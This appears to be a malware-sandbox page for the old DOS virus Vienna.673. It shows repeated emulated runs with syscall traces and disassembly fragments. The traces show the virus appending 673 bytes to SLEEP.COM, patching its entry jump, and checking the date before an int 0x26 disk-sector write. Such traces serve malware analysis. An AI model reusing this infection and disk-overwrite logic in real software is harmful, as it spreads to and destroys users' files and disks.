Sample viewer

vx.netlux.org/Virus.DOS.Vienna.673

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:02.802412508Z 47 PC: 1516a | Get disk transfer address
2018-12-17T22:52:02.804192298Z 26 PC: 1517d | Set disk transfer address
2018-12-17T22:52:02.805237297Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-17T22:52:02.807253382Z 42 PC: 1519a | Get date 0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
0x151b9: mov bx, word ptr [di + 0x63]
0x151bc: int 0x26
0x151be: jmp 0x151c1
0x151c0: nop
0x151c1: pop si
0x151c2: push si
2018-12-17T22:52:02.81096123Z 42 PC: 151a6 | Get date 0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
0x151b9: mov bx, word ptr [di + 0x63]
0x151bc: int 0x26
0x151be: jmp 0x151c1
0x151c0: nop
0x151c1: pop si
0x151c2: push si
0x151c3: add si, 0x1a
0x151c6: nop
0x151c7: lodsb al, byte ptr [si]
0x151c8: mov cx, 0x8000
0x151cb: repne scasb al, byte ptr es:[di]
0x151cd: mov cx, 4
2018-12-17T22:52:02.81308078Z 78 PC: 15244 | Find first file
2018-12-17T22:52:02.818891038Z 67 PC: 15282 | Get or set file attributes
2018-12-17T22:52:02.824915712Z 67 PC: 15294 | Get or set file attributes
2018-12-17T22:52:02.844930706Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:52:02.853963246Z 87 PC: 152ab | Get or set file date and time
2018-12-17T22:52:02.85575298Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-17T22:52:02.862797562Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:52:02.86765172Z 66 PC: 152dc | Move file pointer
2018-12-17T22:52:02.869156873Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-17T22:52:02.881349273Z 66 PC: 15312 | Move file pointer
2018-12-17T22:52:02.883130038Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:52:02.893055826Z 87 PC: 15334 | Get or set file date and time
2018-12-17T22:52:02.898589842Z 62 PC: 15338 | Close file
2018-12-17T22:52:02.906608803Z 67 PC: 15347 | Get or set file attributes
2018-12-17T22:52:02.916882345Z 26 PC: 15354 | Set disk transfer address
2018-12-17T22:52:02.921852556Z 9 PC: 12bb5 | Display string (String= '')
2018-12-17T22:52:02.924154347Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-17T22:52:02.935982492Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10750,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:03.676821234Z 47 PC: 1516a | Get disk transfer address
2018-12-25T12:29:03.678108604Z 26 PC: 1517d | Set disk transfer address
2018-12-25T12:29:03.679046746Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-25T12:29:03.681122547Z 78 PC: 15244 | Find first file
2018-12-25T12:29:03.687219651Z 67 PC: 15282 | Get or set file attributes
2018-12-25T12:29:03.692449624Z 67 PC: 15294 | Get or set file attributes
2018-12-25T12:29:03.709175676Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:03.71615782Z 87 PC: 152ab | Get or set file date and time
2018-12-25T12:29:03.717528059Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-25T12:29:03.719478115Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:03.726323466Z 66 PC: 152dc | Move file pointer
2018-12-25T12:29:03.727620007Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-25T12:29:03.735944751Z 66 PC: 15312 | Move file pointer
2018-12-25T12:29:03.737510463Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:03.743541905Z 87 PC: 15334 | Get or set file date and time
2018-12-25T12:29:03.744963417Z 62 PC: 15338 | Close file
2018-12-25T12:29:03.752932761Z 67 PC: 15347 | Get or set file attributes
2018-12-25T12:29:03.76287431Z 26 PC: 15354 | Set disk transfer address
2018-12-25T12:29:03.766130743Z 9 PC: 12bb5 | Display string (String= '')
2018-12-25T12:29:03.768623508Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-25T12:29:03.781937085Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10750,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:03.973400744Z 47 PC: 1516a | Get disk transfer address
2018-12-25T12:29:03.975484493Z 26 PC: 1517d | Set disk transfer address
2018-12-25T12:29:03.976943029Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-25T12:29:03.979077504Z 42 PC: 1519a | Get date 0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
0x151b9: mov bx, word ptr [di + 0x63]
0x151bc: int 0x26
0x151be: jmp 0x151c1
0x151c0: nop
0x151c1: pop si
0x151c2: push si
2018-12-25T12:29:03.982489676Z 78 PC: 15244 | Find first file
2018-12-25T12:29:03.988397463Z 67 PC: 15282 | Get or set file attributes
2018-12-25T12:29:03.994352204Z 67 PC: 15294 | Get or set file attributes
2018-12-25T12:29:04.013936829Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:04.020341094Z 87 PC: 152ab | Get or set file date and time
2018-12-25T12:29:04.021856881Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-25T12:29:04.026430908Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:04.033219681Z 66 PC: 152dc | Move file pointer
2018-12-25T12:29:04.035381436Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-25T12:29:04.04411158Z 66 PC: 15312 | Move file pointer
2018-12-25T12:29:04.046010568Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:04.052397803Z 87 PC: 15334 | Get or set file date and time
2018-12-25T12:29:04.05390364Z 62 PC: 15338 | Close file
2018-12-25T12:29:04.062343518Z 67 PC: 15347 | Get or set file attributes
2018-12-25T12:29:04.072209368Z 26 PC: 15354 | Set disk transfer address
2018-12-25T12:29:04.076469494Z 9 PC: 12bb5 | Display string (String= '')
2018-12-25T12:29:04.079928769Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-25T12:29:04.090431091Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10750,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:04.427600271Z 47 PC: 1516a | Get disk transfer address
2018-12-25T12:29:04.429936862Z 26 PC: 1517d | Set disk transfer address
2018-12-25T12:29:04.431457688Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-25T12:29:04.434011562Z 78 PC: 15244 | Find first file
2018-12-25T12:29:04.440946835Z 67 PC: 15282 | Get or set file attributes
2018-12-25T12:29:04.459295195Z 67 PC: 15294 | Get or set file attributes
2018-12-25T12:29:04.471469918Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:04.479472018Z 87 PC: 152ab | Get or set file date and time
2018-12-25T12:29:04.481914755Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-25T12:29:04.48449706Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:04.493207972Z 66 PC: 152dc | Move file pointer
2018-12-25T12:29:04.495421128Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-25T12:29:04.504613194Z 66 PC: 15312 | Move file pointer
2018-12-25T12:29:04.506010229Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:04.513356408Z 87 PC: 15334 | Get or set file date and time
2018-12-25T12:29:04.515223455Z 62 PC: 15338 | Close file
2018-12-25T12:29:04.523324403Z 67 PC: 15347 | Get or set file attributes
2018-12-25T12:29:04.534697849Z 26 PC: 15354 | Set disk transfer address
2018-12-25T12:29:04.538064726Z 9 PC: 12bb5 | Display string (String= '')
2018-12-25T12:29:04.540338091Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-25T12:29:04.552415715Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10750,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:04.451344965Z 47 PC: 1516a | Get disk transfer address
2018-12-25T12:29:04.453359009Z 26 PC: 1517d | Set disk transfer address
2018-12-25T12:29:04.455310057Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-25T12:29:04.461151799Z 78 PC: 15244 | Find first file
2018-12-25T12:29:04.477266024Z 67 PC: 15282 | Get or set file attributes
2018-12-25T12:29:04.482890151Z 67 PC: 15294 | Get or set file attributes
2018-12-25T12:29:04.500711984Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:04.508427214Z 87 PC: 152ab | Get or set file date and time
2018-12-25T12:29:04.510097055Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-25T12:29:04.512367495Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:04.519218121Z 66 PC: 152dc | Move file pointer
2018-12-25T12:29:04.521500223Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-25T12:29:04.527940911Z 66 PC: 15312 | Move file pointer
2018-12-25T12:29:04.529562566Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:04.551322113Z 87 PC: 15334 | Get or set file date and time
2018-12-25T12:29:04.552837767Z 62 PC: 15338 | Close file
2018-12-25T12:29:04.560977294Z 67 PC: 15347 | Get or set file attributes
2018-12-25T12:29:04.571694041Z 26 PC: 15354 | Set disk transfer address
2018-12-25T12:29:04.575367976Z 9 PC: 12bb5 | Display string (String= '')
2018-12-25T12:29:04.577500498Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-25T12:29:04.590681022Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10750,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:06.113756424Z 47 PC: 1516a | Get disk transfer address
2018-12-25T12:29:06.115850921Z 26 PC: 1517d | Set disk transfer address
2018-12-25T12:29:06.117347718Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-25T12:29:06.120153446Z 78 PC: 15244 | Find first file
2018-12-25T12:29:06.127671002Z 67 PC: 15282 | Get or set file attributes
2018-12-25T12:29:06.134075682Z 67 PC: 15294 | Get or set file attributes
2018-12-25T12:29:06.154447126Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:06.162157698Z 87 PC: 152ab | Get or set file date and time
2018-12-25T12:29:06.164422149Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-25T12:29:06.166884435Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:06.17465813Z 66 PC: 152dc | Move file pointer
2018-12-25T12:29:06.177787555Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-25T12:29:06.196656018Z 66 PC: 15312 | Move file pointer
2018-12-25T12:29:06.198795871Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:06.214072614Z 87 PC: 15334 | Get or set file date and time
2018-12-25T12:29:06.216457865Z 62 PC: 15338 | Close file
2018-12-25T12:29:06.226307844Z 67 PC: 15347 | Get or set file attributes
2018-12-25T12:29:06.238737498Z 26 PC: 15354 | Set disk transfer address
2018-12-25T12:29:06.242531424Z 9 PC: 12bb5 | Display string (String= '')
2018-12-25T12:29:06.253003711Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-25T12:29:06.266537698Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10750,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:06.220445967Z 47 PC: 1516a | Get disk transfer address
2018-12-25T12:29:06.221899208Z 26 PC: 1517d | Set disk transfer address
2018-12-25T12:29:06.222887459Z 42 PC: 1518d | Get date 0x1518d: cmp cx, 0x7cb
0x15191: jge 0x15196
0x15193: jmp 0x151c1
0x15195: nop
0x15196: mov ah, 0x2a
0x15198: int 0x21
0x1519a: cmp dh, 6
0x1519d: jge 0x151a2
0x1519f: jmp 0x151c1
0x151a1: nop
0x151a2: mov ah, 0x2a
0x151a4: int 0x21
0x151a6: cmp dl, 0x16
0x151a9: jge 0x151ae
0x151ab: jmp 0x151c1
0x151ad: nop
0x151ae: mov al, 1
0x151b0: mov cx, 1
0x151b3: mov dx, 0
0x151b6: mov ds, word ptr [di + 0x37]
2018-12-25T12:29:06.224618075Z 78 PC: 15244 | Find first file
2018-12-25T12:29:06.229013281Z 67 PC: 15282 | Get or set file attributes
2018-12-25T12:29:06.232535855Z 67 PC: 15294 | Get or set file attributes
2018-12-25T12:29:06.244688838Z 61 PC: 1529f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:06.251884983Z 87 PC: 152ab | Get or set file date and time
2018-12-25T12:29:06.253724529Z 44 PC: 152b7 | Get time 0x152b7: and dh, 7
0x152ba: jmp 0x152bd
0x152bc: nop
0x152bd: mov ah, 0x3f
0x152bf: mov cx, 3
0x152c2: mov dx, 0xa
0x152c5: nop
0x152c6: add dx, si
0x152c8: int 0x21
0x152ca: jb 0x15321
0x152cc: cmp ax, 3
0x152cf: jne 0x15321
0x152d1: mov ax, 0x4202
0x152d4: mov cx, 0
0x152d7: mov dx, 0
0x152da: int 0x21
0x152dc: jb 0x15321
0x152de: mov cx, ax
0x152e0: sub ax, 3
0x152e3: mov word ptr [si + 0xe], ax
2018-12-25T12:29:06.25582418Z 63 PC: 152ca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:06.26268256Z 66 PC: 152dc | Move file pointer
2018-12-25T12:29:06.264034431Z 64 PC: 15300 | Write file or device (Write 673 bytes on handle 5)
2018-12-25T12:29:06.272433217Z 66 PC: 15312 | Move file pointer
2018-12-25T12:29:06.275043079Z 64 PC: 15321 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:06.281394535Z 87 PC: 15334 | Get or set file date and time
2018-12-25T12:29:06.282844595Z 62 PC: 15338 | Close file
2018-12-25T12:29:06.29133589Z 67 PC: 15347 | Get or set file attributes
2018-12-25T12:29:06.30191694Z 26 PC: 15354 | Set disk transfer address
2018-12-25T12:29:06.304939568Z 9 PC: 12bb5 | Display string (String= '')
2018-12-25T12:29:06.306889789Z 9 PC: 12bbc | Display string (Could not find end pointer)
2018-12-25T12:29:06.317969545Z 76 PC: 12bd2 | Terminate with return code (Return code = '0')